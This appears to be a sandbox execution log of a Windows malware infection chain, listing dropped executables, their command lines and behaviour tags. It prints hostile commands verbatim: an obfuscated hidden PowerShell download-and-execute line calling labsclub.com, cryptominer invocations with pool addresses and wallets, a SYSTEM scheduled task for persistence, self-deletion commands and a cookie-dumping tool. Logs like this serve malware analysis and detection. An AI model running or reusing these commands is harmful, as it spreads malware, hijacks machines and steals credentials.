C:\Users\Admin\AppData\Roaming\2.exe
C:\Users\Admin\AppData\Roaming\2.exe
12⤵
PID:8248

C:\Users\Admin\AppData\Roaming\2.exe
"{path}"
13⤵
PID:6736

C:\Users\Admin\AppData\Local\Temp\haceb0jprs4\vict.exe
"C:\Users\Admin\AppData\Local\Temp\haceb0jprs4\vict.exe" /VERYSILENT /id=535
11⤵
- Modifies Internet Explorer settings
PID:5536

C:\Users\Admin\AppData\Local\Temp\is-HO1JE.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HO1JE.tmp\vict.tmp" /SL5="$130174,870426,780800,C:\Users\Admin\AppData\Local\Temp\haceb0jprs4\vict.exe" /VERYSILENT /id=535
12⤵
PID:4232

C:\Users\Admin\AppData\Local\Temp\is-DEPDG.tmp\win1host.exe
"C:\Users\Admin\AppData\Local\Temp\is-DEPDG.tmp\win1host.exe" 535
13⤵
PID:8352

C:\Users\Admin\AppData\Local\Temp\oz1d415bvi4\mrejkhgctu0.exe
"C:\Users\Admin\AppData\Local\Temp\oz1d415bvi4\mrejkhgctu0.exe" /ustwo INSTALL
11⤵
PID:4276

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "mrejkhgctu0.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\oz1d415bvi4\mrejkhgctu0.exe" & exit
12⤵
PID:7000

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "mrejkhgctu0.exe" /f
13⤵
- Kills process with taskkill
- Suspicious use of SetWindowsHookEx
PID:4700

C:\Users\Admin\AppData\Local\Temp\VXTJQA8NJ2\setups.exe
"C:\Users\Admin\AppData\Local\Temp\VXTJQA8NJ2\setups.exe" ll
8⤵
PID:8952

C:\Users\Admin\AppData\Local\Temp\is-RO27O.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RO27O.tmp\setups.tmp" /SL5="$50350,454998,229376,C:\Users\Admin\AppData\Local\Temp\VXTJQA8NJ2\setups.exe" ll
9⤵
- Checks computer location settings
PID:8388

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:696

C:\Users\Admin\AppData\Local\Temp\is-UJ6S9.tmp\lylal220.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UJ6S9.tmp\lylal220.tmp" /SL5="$1020C,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:804

C:\Users\Admin\AppData\Local\Temp\is-DRNGH.tmp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\is-DRNGH.tmp\Microsoft.exe" /S /UID=lylal220
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:4220

C:\Program Files\Internet Explorer\BLFFUEPUEI\irecord.exe
"C:\Program Files\Internet Explorer\BLFFUEPUEI\irecord.exe" /VERYSILENT
5⤵
- Executes dropped EXE
PID:4804

C:\Users\Admin\AppData\Local\Temp\is-75AP7.tmp\irecord.tmp
"C:\Users\Admin\AppData\Local\Temp\is-75AP7.tmp\irecord.tmp" /SL5="$1028C,6265333,408064,C:\Program Files\Internet Explorer\BLFFUEPUEI\irecord.exe" /VERYSILENT
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:4392

C:\Users\Admin\AppData\Local\Temp\a7-af632-9ba-cce89-ea168911e17d1\Dozhepohyqo.exe
"C:\Users\Admin\AppData\Local\Temp\a7-af632-9ba-cce89-ea168911e17d1\Dozhepohyqo.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:4748

C:\Users\Admin\AppData\Local\Temp\88-d8027-ab2-147a3-b04ff00288fd0\Peshedijuzha.exe
"C:\Users\Admin\AppData\Local\Temp\88-d8027-ab2-147a3-b04ff00288fd0\Peshedijuzha.exe"
5⤵
- Executes dropped EXE
PID:4800

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lc3cie1a.djd\md6_6ydj.exe & exit
6⤵
PID:5808

C:\Users\Admin\AppData\Local\Temp\lc3cie1a.djd\md6_6ydj.exe
C:\Users\Admin\AppData\Local\Temp\lc3cie1a.djd\md6_6ydj.exe
7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:6816

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e1rc4ltz.us0\askinstall31.exe & exit
6⤵
PID:5608

C:\Users\Admin\AppData\Local\Temp\e1rc4ltz.us0\askinstall31.exe
C:\Users\Admin\AppData\Local\Temp\e1rc4ltz.us0\askinstall31.exe
7⤵
- Executes dropped EXE
PID:7024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hhhuooux.vjt\toolspab1.exe & exit
6⤵
PID:5568

C:\Users\Admin\AppData\Local\Temp\hhhuooux.vjt\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\hhhuooux.vjt\toolspab1.exe
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6348

C:\Users\Admin\AppData\Local\Temp\hhhuooux.vjt\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\hhhuooux.vjt\toolspab1.exe
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6116

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\keqlza33.xkz\GcleanerWW.exe /mixone & exit
6⤵
PID:6292

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xw4b0zky.qkd\setup_10.2_mix.exe & exit
6⤵
PID:8780

C:\Users\Admin\AppData\Local\Temp\xw4b0zky.qkd\setup_10.2_mix.exe
C:\Users\Admin\AppData\Local\Temp\xw4b0zky.qkd\setup_10.2_mix.exe
7⤵
- Drops file in Program Files directory
PID:7064

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dyarhs3h.yqq\file.exe & exit
6⤵
PID:8552

C:\Users\Admin\AppData\Local\Temp\dyarhs3h.yqq\file.exe
C:\Users\Admin\AppData\Local\Temp\dyarhs3h.yqq\file.exe
7⤵
PID:8204

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
8⤵
PID:8744

C:\Users\Admin\AppData\Local\Temp\GPT532NZPG\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\GPT532NZPG\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
9⤵
- Drops file in Windows directory
PID:3828

C:\Users\Admin\AppData\Local\Temp\GPT532NZPG\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\GPT532NZPG\multitimer.exe" 1 3.1617574203.606a393bb086b 101
10⤵
- Adds Run key to start application
PID:4872

C:\Users\Admin\AppData\Local\Temp\GPT532NZPG\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\GPT532NZPG\multitimer.exe" 2 3.1617574203.606a393bb086b
11⤵
- Checks for any installed AV software in registry
PID:5728

C:\Users\Admin\AppData\Local\Temp\cix10clsg1r\cpyrix.exe
"C:\Users\Admin\AppData\Local\Temp\cix10clsg1r\cpyrix.exe" /VERYSILENT
12⤵
- Suspicious use of SetWindowsHookEx
PID:8796

C:\Users\Admin\AppData\Roaming\1.exe
C:\Users\Admin\AppData\Roaming\1.exe
13⤵
PID:8456

C:\Users\Admin\AppData\Roaming\1.exe
"{path}"
14⤵
PID:8932

C:\Users\Admin\AppData\Roaming\2.exe
C:\Users\Admin\AppData\Roaming\2.exe
13⤵
PID:5500

C:\Users\Admin\AppData\Roaming\2.exe
"{path}"
14⤵
PID:7396

C:\Users\Admin\AppData\Local\Temp\jba5xw14ekd\app.exe
"C:\Users\Admin\AppData\Local\Temp\jba5xw14ekd\app.exe" /8-23
12⤵
PID:8728

C:\Users\Admin\AppData\Local\Temp\jba5xw14ekd\app.exe
"C:\Users\Admin\AppData\Local\Temp\jba5xw14ekd\app.exe" /8-23
13⤵
PID:9820

C:\Users\Admin\AppData\Local\Temp\hmmzz3hfxo2\3phllehux0r.exe
"C:\Users\Admin\AppData\Local\Temp\hmmzz3hfxo2\3phllehux0r.exe" /ustwo INSTALL
12⤵
PID:7896

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "3phllehux0r.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\hmmzz3hfxo2\3phllehux0r.exe" & exit
13⤵
PID:2728

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "3phllehux0r.exe" /f
14⤵
- Kills process with taskkill
PID:5064

C:\Users\Admin\AppData\Local\Temp\pj2llq1nezr\vict.exe
"C:\Users\Admin\AppData\Local\Temp\pj2llq1nezr\vict.exe" /VERYSILENT /id=535
12⤵
- Suspicious use of SetWindowsHookEx
PID:8716

C:\Users\Admin\AppData\Local\Temp\is-KHEA5.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KHEA5.tmp\vict.tmp" /SL5="$50474,870426,780800,C:\Users\Admin\AppData\Local\Temp\pj2llq1nezr\vict.exe" /VERYSILENT /id=535
13⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:6404

C:\Users\Admin\AppData\Local\Temp\is-FRV9J.tmp\win1host.exe
"C:\Users\Admin\AppData\Local\Temp\is-FRV9J.tmp\win1host.exe" 535
14⤵
- Suspicious use of SetWindowsHookEx
PID:6584

C:\Users\Admin\AppData\Local\Temp\tuhkxekdinb\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\tuhkxekdinb\Setup3310.exe" /Verysilent /subid=577
12⤵
- Suspicious use of SetWindowsHookEx
PID:5872

C:\Users\Admin\AppData\Local\Temp\is-PGHVA.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PGHVA.tmp\Setup3310.tmp" /SL5="$305E0,138429,56832,C:\Users\Admin\AppData\Local\Temp\tuhkxekdinb\Setup3310.exe" /Verysilent /subid=577
13⤵
- Suspicious use of SetWindowsHookEx
PID:7276

C:\Users\Admin\AppData\Local\Temp\is-3V02A.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-3V02A.tmp\Setup.exe" /Verysilent
14⤵
PID:6864

C:\Users\Admin\AppData\Local\Temp\2RN4NUYX4T\setups.exe
"C:\Users\Admin\AppData\Local\Temp\2RN4NUYX4T\setups.exe" ll
9⤵
- Suspicious use of SetWindowsHookEx
PID:6540

C:\Users\Admin\AppData\Local\Temp\is-KUJG5.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KUJG5.tmp\setups.tmp" /SL5="$602B2,454998,229376,C:\Users\Admin\AppData\Local\Temp\2RN4NUYX4T\setups.exe" ll
10⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:9068

C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
8⤵
PID:9156

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:5016

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:5672

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"
8⤵
PID:4484

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
9⤵
PID:5088

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
10⤵
PID:8684

C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
8⤵
- Modifies data under HKEY_USERS
PID:7820

C:\Users\Admin\AppData\Roaming\20DD.tmp.exe
"C:\Users\Admin\AppData\Roaming\20DD.tmp.exe"
9⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:4100

C:\Windows\system32\msiexec.exe
-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w16181 --cpu-max-threads-hint 50 -r 9999
10⤵
- Blocklisted process makes network request
PID:6672

C:\Windows\system32\msiexec.exe
-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w10001@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
10⤵
PID:8628

C:\Users\Admin\AppData\Roaming\295A.tmp.exe
"C:\Users\Admin\AppData\Roaming\295A.tmp.exe"
9⤵
PID:6740

C:\Windows\SysWOW64\cmd.exe
/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\295A.tmp.exe
10⤵
PID:6260

C:\Windows\SysWOW64\timeout.exe
timeout /t 3
11⤵
- Delays execution with timeout.exe
PID:10156

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
9⤵
PID:7608

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
10⤵
- Runs ping.exe
PID:4476

C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
8⤵
PID:8576

C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
8⤵
PID:9420

C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
8⤵
PID:1432

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
9⤵
PID:7688

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
9⤵
PID:6980

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ih2zhro0.kkg\app.exe /8-2222 & exit
6⤵
PID:9208

C:\Users\Admin\AppData\Local\Temp\ih2zhro0.kkg\app.exe
C:\Users\Admin\AppData\Local\Temp\ih2zhro0.kkg\app.exe /8-2222
7⤵
PID:6420

C:\Users\Admin\AppData\Local\Temp\ih2zhro0.kkg\app.exe
"C:\Users\Admin\AppData\Local\Temp\ih2zhro0.kkg\app.exe" /8-2222
8⤵
PID:8140

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zuet43z3.fug\Four.exe & exit
6⤵
PID:5164

C:\Users\Admin\AppData\Local\Temp\zuet43z3.fug\Four.exe
C:\Users\Admin\AppData\Local\Temp\zuet43z3.fug\Four.exe
7⤵
PID:8724

C:\Users\Admin\AppData\Local\Temp\TOUPVW9HJU\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\TOUPVW9HJU\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
8⤵
PID:7300

C:\Users\Admin\AppData\Local\Temp\TOUPVW9HJU\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\TOUPVW9HJU\multitimer.exe" 1 3.1617574251.606a396b1ba13 104
9⤵
PID:2960

C:\Users\Admin\AppData\Local\Temp\TOUPVW9HJU\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\TOUPVW9HJU\multitimer.exe" 2 3.1617574251.606a396b1ba13
10⤵
PID:5944

C:\Users\Admin\AppData\Local\Temp\uqmguzs3k1a\cpyrix.exe
"C:\Users\Admin\AppData\Local\Temp\uqmguzs3k1a\cpyrix.exe" /VERYSILENT
11⤵
PID:5792

C:\Users\Admin\AppData\Roaming\1.exe
C:\Users\Admin\AppData\Roaming\1.exe
12⤵
PID:6340

C:\Users\Admin\AppData\Roaming\1.exe
"{path}"
13⤵
PID:7348

C:\Users\Admin\AppData\Roaming\2.exe
C:\Users\Admin\AppData\Roaming\2.exe
12⤵
PID:9276

C:\Users\Admin\AppData\Roaming\2.exe
"{path}"
13⤵
PID:10228

C:\Users\Admin\AppData\Local\Temp\ze54wpwjk0b\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\ze54wpwjk0b\Setup3310.exe" /Verysilent /subid=577
11⤵
PID:6412

C:\Users\Admin\AppData\Local\Temp\is-G5IJO.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-G5IJO.tmp\Setup3310.tmp" /SL5="$506EA,138429,56832,C:\Users\Admin\AppData\Local\Temp\ze54wpwjk0b\Setup3310.exe" /Verysilent /subid=577
12⤵
PID:7192

C:\Users\Admin\AppData\Local\Temp\is-8O6Q8.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-8O6Q8.tmp\Setup.exe" /Verysilent
13⤵
PID:9980

C:\Users\Admin\AppData\Local\Temp\ecfulartmis\app.exe
"C:\Users\Admin\AppData\Local\Temp\ecfulartmis\app.exe" /8-23
11⤵
PID:4288

C:\Users\Admin\AppData\Local\Temp\ecfulartmis\app.exe
"C:\Users\Admin\AppData\Local\Temp\ecfulartmis\app.exe" /8-23
12⤵
PID:6892

C:\Users\Admin\AppData\Local\Temp\goht153hrgb\vict.exe
"C:\Users\Admin\AppData\Local\Temp\goht153hrgb\vict.exe" /VERYSILENT /id=535
11⤵
PID:7644

C:\Users\Admin\AppData\Local\Temp\is-RDBND.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RDBND.tmp\vict.tmp" /SL5="$604E0,870426,780800,C:\Users\Admin\AppData\Local\Temp\goht153hrgb\vict.exe" /VERYSILENT /id=535
12⤵
PID:5776

C:\Users\Admin\AppData\Local\Temp\is-CB1IP.tmp\win1host.exe
"C:\Users\Admin\AppData\Local\Temp\is-CB1IP.tmp\win1host.exe" 535
13⤵
PID:7416

C:\Users\Admin\AppData\Local\Temp\2jsmvz13xoc\k4i03m2xhsd.exe
"C:\Users\Admin\AppData\Local\Temp\2jsmvz13xoc\k4i03m2xhsd.exe" /ustwo INSTALL
11⤵
PID:9148

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "k4i03m2xhsd.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\2jsmvz13xoc\k4i03m2xhsd.exe" & exit
12⤵
PID:9720

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "k4i03m2xhsd.exe" /f
13⤵
- Kills process with taskkill
PID:7676

C:\Users\Admin\AppData\Local\Temp\Z9XS54PBUB\setups.exe
"C:\Users\Admin\AppData\Local\Temp\Z9XS54PBUB\setups.exe" ll
8⤵
PID:8196

C:\Users\Admin\AppData\Local\Temp\is-1HA3M.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1HA3M.tmp\setups.tmp" /SL5="$80604,454998,229376,C:\Users\Admin\AppData\Local\Temp\Z9XS54PBUB\setups.exe" ll
9⤵
PID:8500

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2640

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
3⤵
PID:4516

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install
4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5112

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3200

C:\Users\Admin\AppData\Local\Temp\UA7OJ5RCK1\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\UA7OJ5RCK1\multitimer.exe" 0 306065bb10421b26.04333812 0 103
3⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4928

C:\Users\Admin\AppData\Local\Temp\UA7OJ5RCK1\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\UA7OJ5RCK1\multitimer.exe" 1 3.1617574046.606a389e5730c 103
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4284

C:\Users\Admin\AppData\Local\Temp\UA7OJ5RCK1\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\UA7OJ5RCK1\multitimer.exe" 2 3.1617574046.606a389e5730c
5⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
PID:3956

C:\Users\Admin\AppData\Local\Temp\4w2vikca5hh\cpyrix.exe
"C:\Users\Admin\AppData\Local\Temp\4w2vikca5hh\cpyrix.exe" /VERYSILENT
6⤵
- Executes dropped EXE
PID:6080

C:\Users\Admin\AppData\Roaming\1.exe
C:\Users\Admin\AppData\Roaming\1.exe
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7524

C:\Users\Admin\AppData\Roaming\1.exe
"{path}"
8⤵
PID:5448

C:\Users\Admin\AppData\Roaming\1.exe
"{path}"
8⤵
PID:7464

C:\Users\Admin\AppData\Roaming\2.exe
C:\Users\Admin\AppData\Roaming\2.exe
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7836

C:\Users\Admin\AppData\Roaming\2.exe
"{path}"
8⤵
PID:5068

C:\Users\Admin\AppData\Local\Temp\rm2etdiley5\ei111qo1fyj.exe
"C:\Users\Admin\AppData\Local\Temp\rm2etdiley5\ei111qo1fyj.exe" /VERYSILENT
6⤵
- Executes dropped EXE
PID:3772

C:\Users\Admin\AppData\Local\Temp\is-8LPLS.tmp\ei111qo1fyj.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8LPLS.tmp\ei111qo1fyj.tmp" /SL5="$1036E,2592217,780800,C:\Users\Admin\AppData\Local\Temp\rm2etdiley5\ei111qo1fyj.exe" /VERYSILENT
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5236

C:\Users\Admin\AppData\Local\Temp\is-9OO5R.tmp\winlthsth.exe
"C:\Users\Admin\AppData\Local\Temp\is-9OO5R.tmp\winlthsth.exe"
8⤵
- Executes dropped EXE
PID:6656

C:\Users\Admin\AppData\Local\Temp\789XxuUZG.exe
"C:\Users\Admin\AppData\Local\Temp\789XxuUZG.exe"
9⤵
PID:2092

C:\Windows\SysWOW64\at.exe
"C:\Windows\System32\at.exe"
10⤵
PID:5892

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif
10⤵
PID:1204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe
11⤵
PID:3916

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^CaWSaeSvAdYkfzbpRfhIGeKeRfokmseCgqWsHlzIpUNnKXGDsJAgYjEmITwrUHXogvWfbyBGVFmLfksUIFTQRNDevvJNpd$" Amai.gif
12⤵
PID:10224

C:\Users\Admin\AppData\Roaming\wipetKbAeQHS\Suono.exe.com
Suono.exe.com U
12⤵
PID:5208

C:\Users\Admin\AppData\Roaming\wipetKbAeQHS\Suono.exe.com
C:\Users\Admin\AppData\Roaming\wipetKbAeQHS\Suono.exe.com U
13⤵
PID:2192

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "mLdghlcqNQ" /tr "C:\\Users\\Admin\\AppData\\Roaming\\ThUbGJfUzN\\mLdghlcqNQ.exe.com C:\\Users\\Admin\\AppData\\Roaming\\ThUbGJfUzN\\s" /sc onstart /F /RU SYSTEM
14⤵
- Creates scheduled task(s)
PID:1460

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
15⤵
PID:8628

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 30
12⤵
- Runs ping.exe
PID:9608

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
9⤵
PID:6232

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
10⤵
- Blocklisted process makes network request
PID:4408

C:\Users\Admin\AppData\Local\Temp\f4cpxldsi3s\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\f4cpxldsi3s\Setup3310.exe" /Verysilent /subid=577
6⤵
- Executes dropped EXE
PID:5916

C:\Users\Admin\AppData\Local\Temp\is-88354.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-88354.tmp\Setup3310.tmp" /SL5="$10378,138429,56832,C:\Users\Admin\AppData\Local\Temp\f4cpxldsi3s\Setup3310.exe" /Verysilent /subid=577
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5512

C:\Users\Admin\AppData\Local\Temp\is-AFLTU.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-AFLTU.tmp\Setup.exe" /Verysilent
8⤵
- Executes dropped EXE
PID:6768

C:\Users\Admin\AppData\Local\Temp\vbjy43onw34\01ltqhcgv4q.exe
"C:\Users\Admin\AppData\Local\Temp\vbjy43onw34\01ltqhcgv4q.exe"
6⤵
- Executes dropped EXE
PID:6040

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\vbjy43onw34\01ltqhcgv4q.exe"
7⤵
PID:6844

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
8⤵
- Runs ping.exe
PID:5140

C:\Users\Admin\AppData\Local\Temp\rmqdtxkjm2t\tyhrqw4xlm3.exe
"C:\Users\Admin\AppData\Local\Temp\rmqdtxkjm2t\tyhrqw4xlm3.exe" /ustwo INSTALL
6⤵
- Executes dropped EXE
PID:5204

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "tyhrqw4xlm3.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\rmqdtxkjm2t\tyhrqw4xlm3.exe" & exit
7⤵
PID:5008

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "tyhrqw4xlm3.exe" /f
8⤵
- Kills process with taskkill
PID:7160

C:\Users\Admin\AppData\Local\Temp\jackqivxgfe\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\jackqivxgfe\vpn.exe" /silent /subid=482
6⤵
- Executes dropped EXE
PID:5080

C:\Users\Admin\AppData\Local\Temp\is-QK2PL.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QK2PL.tmp\vpn.tmp" /SL5="$1038C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\jackqivxgfe\vpn.exe" /silent /subid=482
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:5704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
8⤵
PID:7040

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
9⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:5364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
8⤵
PID:6136

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
9⤵
PID:5620

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
8⤵
- Executes dropped EXE
